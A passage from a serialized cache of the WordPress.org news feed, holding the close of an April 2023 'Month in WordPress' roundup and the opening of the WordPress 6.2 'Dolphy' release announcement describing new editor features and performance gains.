“Dolphy.”</a></p>\n</blockquote>\n\n\n\n<div style=\"height:3px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">WP20 swag is here</h2>\n\n\n\n<p>Show your WordPress excitement with <strong>limited edition 20th anniversary merchandise</strong>—now available at the official <a href=\"https://mercantile.wordpress.org/product-category/wp20/\"><strong>WordPress Mercantile store</strong></a>. If you prefer to create your own swag, you can use these <a href=\"https://wp20.wordpress.net/download-the-wp20-commemorative-logos/\">WP20 downloadable assets</a>.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"576\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/04/digital-banner-1.png?resize=1024%2C576&#038;ssl=1\" alt=\"Blue background with confetti and WordPress 20th anniversary commemorative logo.\" class=\"wp-image-14785\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/04/digital-banner-1.png?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2023/04/digital-banner-1.png?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/04/digital-banner-1.png?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2023/04/digital-banner-1.png?resize=1536%2C864&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2023/04/digital-banner-1.png?resize=2048%2C1152&amp;ssl=1 2048w, https://i0.wp.com/wordpress.org/news/files/2023/04/digital-banner-1.png?w=3000&amp;ssl=1 3000w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>The 20th anniversary website <a href=\"https://wp20.wordpress.net/wp20-celebrations/\" data-type=\"URL\" data-id=\"https://wp20.wordpress.net/wp20-celebrations/\">lists celebrations</a> as organizers announce and schedule them. Check back regularly to see if there’s an event in your area to join or <a href=\"https://wordpress.org/news/2023/03/lets-party-organize-your-wp20-celebration/\">help organize one</a> to celebrate this milestone with your local community.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://wp20.wordpress.net/wapuu-coloring-giveaway-style-your-own-party-wapuu/\">Enter the Wapuu Coloring Giveaway</a> by April 17, 2023, for a chance to win some commemorative WP20 swag!</p>\n</blockquote>\n\n\n\n<div style=\"height:3px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">New in the Gutenberg plugin</h2>\n\n\n\n<p>Two new versions of the Gutenberg plugin have shipped in the last month:</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/13/whats-new-in-gutenberg-15-3-13-march/\"><strong>Gutenberg 15.3</strong></a><strong> </strong>was released on March 13, 2023. This version polishes the Site Editor experience, includes a new “Time to Read” block for displaying estimated read time to posts, and enhances the Duotone design tool.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/22/whats-new-in-gutenberg-15-4-22-march/\"><strong>Gutenberg 15.4</strong></a> is available for download as of March 22, 2023, and focuses primarily on bug fixes and testing improvements. Other additions include color and layout support for the Cover block, improved descriptions to help you understand the purpose of each template in the Site Editor, and the ability to turn paragraph blocks into columns.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://make.wordpress.org/core/2023/02/01/core-editor-improvement-strengthening-style-options/\"></a>Follow the “<a href=\"https://make.wordpress.org/core/tag/gutenberg-new/\">What’s new in Gutenberg</a>” posts to stay on top of the latest enhancements.</p>\n</blockquote>\n\n\n\n<div style=\"height:3px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">Team updates: Phase 3 planning, WordPress Developer Blog launch, and more</h2>\n\n\n\n<ul>\n<li>Gutenberg Lead Architect Matías Ventura <a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">outlined the focus areas</a> for Phase 3 of the WordPress development roadmap, known as <strong>Collaboration</strong> or <strong>Collaborative Editing</strong>.</li>\n\n\n\n<li>Last month, the <a href=\"https://wordpress.org/news/2023/03/introducing-the-wordpress-developer-blog/\">WordPress Developer Blog</a> officially launched (removing the &#8220;beta&#8221; label). <a href=\"https://developer.wordpress.org/news/#subscribe\">Subscribe</a> to keep up with the latest features, tutorials, and learning resources in the WordPress development space.</li>\n\n\n\n<li>The Documentation Team seeks volunteers to help with <a href=\"https://make.wordpress.org/docs/2023/03/15/call-for-volunteers-to-help-with-6-2-end-user-documentation/\">WordPress 6.2 end user documentation</a>.</li>\n\n\n\n<li>Are you looking to broaden your knowledge and improve your WordPress skills? See <a href=\"https://make.wordpress.org/updates/2023/04/01/whats-new-on-learn-wordpress-in-march-2023/\">what’s new on Learn WordPress in March 2023</a>, including the latest course on <a href=\"https://learn.wordpress.org/course/converting-a-shortcode-to-a-block/\">Converting a Shortcode to a Block</a>.</li>\n\n\n\n<li>A new <a href=\"https://make.wordpress.org/themes/2023/03/03/hallway-hangout-community-themes-initiative/\">Community Themes initiative</a> aims to bring together a group of contributors to collaborate and build block themes.</li>\n\n\n\n<li>The Training Team is looking for assistance in creating content to complete <a href=\"https://make.wordpress.org/training/2023/03/29/introduction-to-wordpress-development-syllabus/\">this WordPress Development syllabus</a>.</li>\n\n\n\n<li>The newly formed Contributor Working Group <a href=\"https://make.wordpress.org/community/2023/03/23/recap-of-contributor-working-group-inaugural-mentorship-chat-on-march-20-2023/\">hosted an inaugural chat</a> to kick off work on the <a href=\"https://make.wordpress.org/project/2023/02/06/proposal-creating-a-wordpress-contributor-mentorship-program/\">WordPress Mentorship Program</a>.</li>\n\n\n\n<li>The Polyglots Team is <a href=\"https://make.wordpress.org/polyglots/2023/03/29/adding-chatgpt-and-deepl-in-the-translation-memory/\">testing AI systems</a> to help with translation work.</li>\n\n\n\n<li>The WordPress.org redesign project has a new dedicated Making WordPress Slack channel to coordinate work: <a href=\"https://wordpress.slack.com/archives/C04U953K77A\">#website-redesign</a>.</li>\n\n\n\n<li>The March 2023 editions of the <a href=\"https://make.wordpress.org/polyglots/2023/03/15/polyglots-monthly-newsletter-march-2023/\">Polyglots monthly newsletter</a> and the <a href=\"https://make.wordpress.org/community/2023/03/21/meetup-organizer-newsletter-march-2023/\">Meetup Organizer newsletter</a> are available for reading.</li>\n\n\n\n<li>The Mobile Team announced a <a href=\"https://make.wordpress.org/mobile/2023/03/28/new-mobile-support-forum/\">new support forum</a> for the WordPress mobile app.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Tune in to <a href=\"https://wordpress.org/news/2023/03/episode-52-phase-three-with-hector-prieto/\">Episode 52 of WP Briefing</a> to learn more about the visioning behind Phase 3, Collaboration.</p>\n</blockquote>\n\n\n\n<div style=\"height:3px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">Feedback &amp; testing requests</h2>\n\n\n\n<ul>\n<li>A new Full Site Editing (FSE) Program exploration looks into the Site Editor as a design tool in light of the recent WordPress 6.2 release. Participants are asked to create a block theme without coding using the current editor tools. <a href=\"https://make.wordpress.org/test/2023/03/29/fse-program-exploration-build-a-block-theme/\">Share your experience</a> by April 26, 2023.</li>\n\n\n\n<li>A group of Core contributors is working on a new <a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Interactivity API proposal</a> to provide a better developer experience for building interactive blocks.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/03/25/mobile-team-update-march-25th/\">Version 22.0</a> of the WordPress mobile app for iOS and Android is ready for testing.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Members of the Core Team are looking for user experience (UX) feedback on the <a href=\"https://make.wordpress.org/core/2023/03/28/call-for-testing-plugin-dependencies-ux/\">Plugin Dependencies feature plugin</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:3px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">WordPress events updates</h2>\n\n\n\n<ul>\n<li>WordCamp Asia 2024 is <a href=\"https://asia.wordcamp.org/2024/\">calling for organizers</a>. Apply by April 15, 2023.</li>\n\n\n\n<li>Registration for the <a href=\"https://europe.wordcamp.org/2023/contributor-day-registration-is-now-open/\">WordCamp Europe 2023 Contributor Day</a> is now open.</li>\n\n\n\n<li>Want to create diverse and inclusive WordPress events? Mark your calendars for the upcoming <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/diversity-speaker-training-workshop/#upcoming-wpdiversity-workshops\">#WPDiversity workshops</a>.</li>\n\n\n\n<li>Four WordCamps are taking place this month:\n<ul>\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1ee-1f1f9.png\" alt=\"🇮🇹\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://torino.wordcamp.org/2023/\">WordCamp Torino</a>, Italy, on April 14-15, 2023</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1e6-1f1f9.png\" alt=\"🇦🇹\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://vienna.wordcamp.org/2023/\">Wordcamp Vienna</a>, Austria, on April 15-16, 2023</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1eb-1f1f7.png\" alt=\"🇫🇷\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://paris.wordcamp.org/2023/\">WordCamp Paris</a>, France, on April 21, 2023</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1e7-1f1ec.png\" alt=\"🇧🇬\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://sofia.wordcamp.org/2023/\">WordCamp Sofia</a>, Bulgaria, on April 22-23, 2023</li>\n</ul>\n</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Join WordPress Executive Director Josepha Haden Chomphosy as she discusses <a href=\"https://wordpress.org/news/2023/03/episode-51-is-routine-a-rut/\">the benefits of routine and what role it plays in the WordPress project</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:3px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<hr class=\"wp-block-separator has-text-color has-light-grey-color has-alpha-channel-opacity has-light-grey-background-color has-background\" />\n\n\n\n<p><strong><em><strong><em><strong><em>Have a story we should include in the next issue of The Month in WordPress? <strong><em>Fill out </em></strong><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><strong><em>this quick form</em></strong></a><strong><em> to let us know.</em></strong></em></strong></em></strong></em></strong></p>\n\n\n\n<p><em><em>The following folks contributed to this Month in WordPress: <a href=\'https://profiles.wordpress.org/bsanevans/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>bsanevans</a>, <a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>, <a href=\'https://profiles.wordpress.org/eidolonnight/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>eidolonnight</a>, <a href=\'https://profiles.wordpress.org/rmartinezduque/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>rmartinezduque</a>, <a href=\'https://profiles.wordpress.org/sereedmedia/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sereedmedia</a>.</em></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14780\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:66:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"WordPress 6.2 “Dolphy”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://wordpress.org/news/2023/03/dolphy/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Mar 2023 18:57:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"6.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=14659\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:202:\"WordPress 6.2 \"Dolphy\" is here! Named for Eric Allen Dolphy Jr. the celebrated jazz woodwind player and ensemblist. Over 600 contributors made this release possible. Download WordPress 6.2 Dolphy today.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:63330:\"\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/inline-image-x2-1.png?resize=1024%2C683&#038;ssl=1\" alt=\"WordPress 6.2 &quot;Dolphy&quot;\" class=\"wp-image-14732\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/inline-image-x2-1.png?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2023/03/inline-image-x2-1.png?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/inline-image-x2-1.png?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2023/03/inline-image-x2-1.png?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2023/03/inline-image-x2-1.png?resize=2048%2C1365&amp;ssl=1 2048w, https://i0.wp.com/wordpress.org/news/files/2023/03/inline-image-x2-1.png?w=3000&amp;ssl=1 3000w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Say hello to WordPress 6.2 “Dolphy,&#8221; named for the woodwind jazz wiz, the multi-instrumentalist—<a href=\"https://en.wikipedia.org/wiki/Eric_Dolphy\">Eric Allan Dolphy Jr</a>. Dolphy is acclaimed for having brought the bass clarinet to prominence in the jazz scene, creating a place for the flute and extending the lexicon of the alto saxophone. In a career that spanned continents, his artistry was at the forefront of pushing improvisational boundaries, ensemble work, and partnerships with well-respected artists like Charles Mingus and John Coltrane.</p>\n\n\n\n<p>This latest version of WordPress reimagines your site editing experience, introduces more ways to style your site, and offers a new distraction-free way to write. Discover improvements that give you more control and freedom to express your creative vision. There’s something for everyone, whether you’re a content creator, developer, site builder, or designer. Let the <a href=\"https://open.spotify.com/artist/6rxxu32JCGDpKKMPHxnSJp?si=UEYO5JU5TXyEeINuuhN6aQ\">music of Eric Dolphy</a> delight you as you take in all that 6.2 has to offer.</p>\n\n\n\n<div class=\"wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link wp-element-button\" href=\"https://wordpress.org/wordpress-6.2.zip\">Download WordPress 6.2 today</a></div>\n</div>\n\n\n\n<p>WordPress 6.2 is the first major release of 2023, covering over 900 enhancements and fixes. It’s also a transition point in the WordPress project’s <a href=\"https://wordpress.org/about/roadmap/\">development roadmap</a>, shifting focus from customization to <a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">early exploration of workflows and collaboration</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\">What’s inside</h2>\n\n\n\n<h4 class=\"wp-block-heading\">Meet&nbsp;the reimagined Site Editor</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Site-Editor.png?resize=536%2C536&#038;ssl=1\" alt=\"Image inlay of the reimagined Site Editor. WordPress 6.2 Dolphy\" class=\"wp-image-14661\" width=\"536\" height=\"536\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Site-Editor.png?w=872&amp;ssl=1 872w, https://i0.wp.com/wordpress.org/news/files/2023/03/Site-Editor.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Site-Editor.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/wordpress.org/news/files/2023/03/Site-Editor.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"(max-width: 536px) 100vw, 536px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Ready for you to dive in and explore: 6.2 is your invitation to discover what the next generation of WordPress—and block themes—can do.&nbsp;</p>\n\n\n\n<p>Now out of beta, the Site Editor has an updated interface, giving you a new way to interact with your entire site. Explore full previews of your templates and template parts, then jump in and get to editing your site from wherever you choose.</p>\n\n\n\n<h4 class=\"wp-block-heading\">Manage menus in more ways with the Navigation block</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Navigation.png?resize=532%2C532&#038;ssl=1\" alt=\"Image inlay of menu management from the Navigation block\" class=\"wp-image-14662\" width=\"532\" height=\"532\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Navigation.png?w=872&amp;ssl=1 872w, https://i0.wp.com/wordpress.org/news/files/2023/03/Navigation.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Navigation.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/wordpress.org/news/files/2023/03/Navigation.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"(max-width: 532px) 100vw, 532px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Add, remove, and reorder menu items faster—with a new sidebar experience that makes editing your site’s navigation easier.</p>\n\n\n\n<h4 class=\"wp-block-heading\">Discover a smoother experience for the Block Inserter</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Patterns-Inserter.png?resize=536%2C536&#038;ssl=1\" alt=\"Image inlay of the Block Inserter\" class=\"wp-image-14663\" width=\"536\" height=\"536\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Patterns-Inserter.png?w=872&amp;ssl=1 872w, https://i0.wp.com/wordpress.org/news/files/2023/03/Patterns-Inserter.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Patterns-Inserter.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/wordpress.org/news/files/2023/03/Patterns-Inserter.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"(max-width: 536px) 100vw, 536px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>A refreshed design gives you easier access to the content you need. Use the Media tab to quickly drag and drop content from your existing Media Library. Find patterns faster with a split view that lets you navigate categories and see previews all at once.</p>\n\n\n\n<h4 class=\"wp-block-heading\">Find the controls you want when you need them</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Settings-and-Styles-Tabs.png?resize=540%2C540&#038;ssl=1\" alt=\"Tab between settings and styles in the block settings sidebar\" class=\"wp-image-14664\" width=\"540\" height=\"540\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Settings-and-Styles-Tabs.png?w=872&amp;ssl=1 872w, https://i0.wp.com/wordpress.org/news/files/2023/03/Settings-and-Styles-Tabs.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Settings-and-Styles-Tabs.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/wordpress.org/news/files/2023/03/Settings-and-Styles-Tabs.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"(max-width: 540px) 100vw, 540px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Your block settings sidebar is better organized with tabs for Settings and Styles. So the tools you need are easy to identify and access.&nbsp;</p>\n\n\n\n<h4 class=\"wp-block-heading\">Build faster with headers and footers for block themes</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Block-themes.png?resize=534%2C534&#038;ssl=1\" alt=\"\" class=\"wp-image-14671\" width=\"534\" height=\"534\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Block-themes.png?w=872&amp;ssl=1 872w, https://i0.wp.com/wordpress.org/news/files/2023/03/Block-themes.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Block-themes.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/wordpress.org/news/files/2023/03/Block-themes.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"(max-width: 534px) 100vw, 534px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Discover a new collection of header and footer patterns. Use them with any block theme as a quick, high-quality starting point for your site’s templates.</p>\n\n\n\n<h4 class=\"wp-block-heading\">Explore Openverse media right from the Editor</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Openverse.png?resize=544%2C544&#038;ssl=1\" alt=\"\" class=\"wp-image-14670\" width=\"544\" height=\"544\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Openverse.png?w=872&amp;ssl=1 872w, https://i0.wp.com/wordpress.org/news/files/2023/03/Openverse.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Openverse.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/wordpress.org/news/files/2023/03/Openverse.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"(max-width: 544px) 100vw, 544px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Openverse’s library catalogs over 700 million+ free, openly licensed stock images and audio—and now it’s directly integrated into the WordPress experience through the Inserter.&nbsp;</p>\n\n\n\n<h4 class=\"wp-block-heading\">Focus on writing with Distraction Free mode</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Distraction-Free.png?resize=542%2C542&#038;ssl=1\" alt=\"\" class=\"wp-image-14665\" width=\"542\" height=\"542\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Distraction-Free.png?w=872&amp;ssl=1 872w, https://i0.wp.com/wordpress.org/news/files/2023/03/Distraction-Free.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Distraction-Free.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/wordpress.org/news/files/2023/03/Distraction-Free.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"(max-width: 542px) 100vw, 542px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>For those times you want to be alone with your ideas. You can now hide all your panels and controls, leaving you free to bring your content to life.</p>\n\n\n\n<h4 class=\"wp-block-heading\">Meet the new Style Book</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"560\" height=\"560\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Style-Book.png?resize=560%2C560&#038;ssl=1\" alt=\"\" class=\"wp-image-14667\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Style-Book.png?w=560&amp;ssl=1 560w, https://i0.wp.com/wordpress.org/news/files/2023/03/Style-Book.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Style-Book.png?resize=150%2C150&amp;ssl=1 150w\" sizes=\"(max-width: 560px) 100vw, 560px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Get a complete overview of how every block in your site’s library looks. All in one place, all at a glance, directly in the Site Editor.</p>\n\n\n\n<h4 class=\"wp-block-heading\">Copy and paste styles</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"560\" height=\"560\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Copy-_-Paste.png?resize=560%2C560&#038;ssl=1\" alt=\"\" class=\"wp-image-14666\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Copy-_-Paste.png?w=560&amp;ssl=1 560w, https://i0.wp.com/wordpress.org/news/files/2023/03/Copy-_-Paste.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Copy-_-Paste.png?resize=150%2C150&amp;ssl=1 150w\" sizes=\"(max-width: 560px) 100vw, 560px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Perfect the design on one type of block, then copy and paste those styles to other blocks to get just the look you want.</p>\n\n\n\n<h4 class=\"wp-block-heading\">Custom CSS</h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"560\" height=\"560\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Custom-CSS.png?resize=560%2C560&#038;ssl=1\" alt=\"\" class=\"wp-image-14669\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/03/Custom-CSS.png?w=560&amp;ssl=1 560w, https://i0.wp.com/wordpress.org/news/files/2023/03/Custom-CSS.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/03/Custom-CSS.png?resize=150%2C150&amp;ssl=1 150w\" sizes=\"(max-width: 560px) 100vw, 560px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Power up your site any way you wish with design tools and custom CSS for another level of control over your site’s look and feel for maximum creativity and artistry in your designs.</p>\n\n\n\n<h3 class=\"wp-block-heading\">Other highlights in 6.2</h3>\n\n\n\n<ul>\n<li><strong>Sticky positioning</strong>: Choose to keep top-level group blocks fixed to the top of a page as visitors scroll.</li>\n\n\n\n<li><strong>Importing widgets</strong>: Options to import your favorite widgets from Classic themes to Block themes.</li>\n\n\n\n<li><strong>Local fonts in themes</strong>: Default WordPress themes offer better privacy with Google Fonts now included.</li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\">Performance highlights</h3>\n\n\n\n<p>“Dolphy” includes several impressive performance improvements. You’ll note overall faster load times for block themes of 14 to 18%, and for classic themes, speed increases of 2 to 5%. Server-side performance is also significantly boosted, with an increase of 17 to 23% for block themes and 3 to 5% for classic themes, 3 to 5%. The performance team is dedicated to these kinds of improvements. You can learn more about their work by following the Making WordPress blog using the <a href=\"https://make.wordpress.org/core/tag/performance/\">#performance hashtag</a>.</p>\n\n\n\n<blockquote class=\"wp-block-quote\"></blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">Learn more about WordPress 6.2</h2>\n\n\n\n<p>Explore <a href=\"https://learn.wordpress.org/workshops/\">Learn WordPress</a> for quick how-to videos, courses, and other resources for the latest features in WordPress. Or join a free 